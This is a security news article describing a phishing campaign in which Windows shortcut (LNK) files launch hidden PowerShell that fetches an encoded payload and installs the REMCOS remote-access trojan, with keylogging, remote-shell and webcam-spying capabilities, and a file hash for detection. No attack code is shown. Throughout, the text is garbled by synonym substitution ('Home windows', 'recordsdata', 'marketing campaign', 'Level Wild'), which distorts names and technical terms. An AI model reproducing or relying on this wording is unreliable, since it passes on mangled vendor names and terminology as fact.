A brand new and misleading multi-stage malware marketing campaign has been recognized by the Lat61 Risk Intelligence group at safety agency Level Wild. The assault makes use of a intelligent method involving malicious Home windows Shortcut, or LNK, recordsdata, a easy pointer to a program or file, to ship a harmful remote-access trojan (RAT) referred to as REMCOS.
The analysis, led by Dr. Zulfikar Ramzan, the CTO of Level Wild, and shared with Hackread.com, reveals that the marketing campaign begins with a seemingly innocent shortcut file, probably hooked up to an e mail, with a filename like “ORDINE-DI-ACQUIST-7263535.”
When a consumer clicks on it, the LNK file discreetly runs a PowerShell command within the background. On your data, PowerShell is a robust command-line software Home windows utilises for process automation; nonetheless, on this assault, it’s used to obtain/decode a hidden payload.
This command is designed to obtain and decode a hidden payload with out triggering safety alerts, saving any recordsdata, or utilizing macros. The analysis gives particular file hashes for this LNK file, together with MD5: ae8066bd5a66ce22f6a91bd935d4eee6, to assist in detection.
The Assault’s Hidden Layers:
This marketing campaign is designed to be stealthy by utilizing a number of totally different layers of disguise. After the preliminary PowerShell command runs, it fetches a Base64-encoded payload from a distant server. This can be a frequent technique to conceal malicious code in plain sight, as Base64 is a normal technique for encoding binary information into textual content.
As soon as the payload is downloaded and decoded, it’s launched as a Program Info File or .PIF file, which is a sort of executable typically used for older applications. The attackers disguised this file as CHROME.PIF mimicking a legit program.
This last step installs the REMCOS backdoor, giving attackers full management of the compromised system. The malware additionally ensures its persistence on the system by making a log file for its keystroke recording in a brand new Remcos folder underneath the %ProgramData% listing.
What the REMCOS Backdoor Can Do
As soon as put in, the REMCOS backdoor grants the attackers in depth management over the sufferer’s pc. The menace intelligence report notes that it might carry out a variety of malicious actions, together with keylogging to steal passwords, making a distant shell for direct entry, and getting access to recordsdata.
Moreover, the REMCOS backdoor permits the attackers to regulate the pc’s webcam and microphone, enabling them to spy on the consumer. The analysis additionally revealed that the command and management (C2) infrastructure for this particular marketing campaign is hosted in Romania and the US.
This discovering highlights the necessity for warning, as these assaults can originate from wherever on the planet. Researchers suggest that customers keep cautious with shortcut recordsdata from untrusted sources, double-check attachments earlier than opening them, and use up to date antivirus software program with real-time safety.
